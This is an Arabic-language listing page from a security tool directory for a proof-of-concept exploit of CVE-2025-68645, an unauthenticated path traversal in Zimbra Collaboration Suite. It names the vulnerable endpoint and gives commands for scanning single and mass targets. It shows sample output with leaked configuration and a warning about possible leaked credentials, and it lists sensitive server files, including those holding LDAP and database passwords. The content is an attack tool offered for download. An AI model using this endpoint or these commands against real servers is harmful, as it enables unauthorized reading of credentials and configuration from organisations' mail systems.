Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Poc_CVE-2025-68645 — Zimbra Path Traversal (CVE-2025-68645) - ثغرة قراءة ملف غير مصادق عليها في Zimbra Collaboration Suite | Kitploit
أدوات/GitHubGitHub/harisaidhin/poc_cve-2025-68645
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubharisaidhin/poc_cve-2025-68645

Poc_CVE-2025-68645

Zimbra Path Traversal (CVE-2025-68645) - ثغرة قراءة ملف غير مصادق عليها في Zimbra Collaboration Suite

عرض المستودع
11منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-68645 - ثغرة اجتياز المسار في Zimbra

Security CVE Python License Status

📋 نظرة عامة

CVE-2025-68645 هي ثغرة اجتياز المسار في Zimbra Collaboration Suite تسمح للمهاجمين غير المصادقين بقراءة ملفات عشوائية من نظام ملفات الخادم.

النقطة النهائية المعرضة للخطر

/h/printconversations?javax.servlet.include.servlet_path=

🎯 التأثير

التأثيرالخطورة
قراءة ملف غير مصادق عليها🔴 عالية
كشف التكوين🔴 عالية
تسريب بيانات الاعتماد🔴 عالية
رسم خرائط الشبكة الداخلية🟠 متوسطة

📁 الملفات القابلة للقراءة

🚀 الاستخدام

فحص هدف واحد

python CVE-2025-68645.py.py -t https://target.zimbra.com

الفحص الجماعي

python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20

الخيارات المتقدمة

python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30

📊 وسائط سطر الأوامر

الوسيط الوصف الافتراضي -t, --target عنوان URL هدف واحد None -l, --list ملف يحتوي على قائمة الأهداف None -o, --output اسم ملف الإخراج results.json --threads عدد الخيوط المتزامنة 10 --timeout مهلة الطلب بالثواني 15 -v, --verbose تمكين الإخراج المفصل False --no-verify تعطيل التحقق من SSL False --read-all قراءة جميع المسارات الحساسة False

📸 مثال على الإخراج

[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml

============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0

تنزيل الأداة
المسارالمعلومات المكشوفة
/WEB-INF/web.xmlتعيينات Servlet، قيود الأمان
/WEB-INF/zcs.web.xmlتكوين خاص بـ Zimbra
/opt/zimbra/conf/localconfig.xmlبيانات اعتماد LDAP، كلمات مرور قاعدة البيانات
/opt/zimbra/conf/ldap-config.xmlتكوين خادم LDAP
/opt/zimbra/conf/attrs/zimbra-attrs.xmlسمات النظام
/WEB-INF/classes/logging.propertiesتكوين التسجيل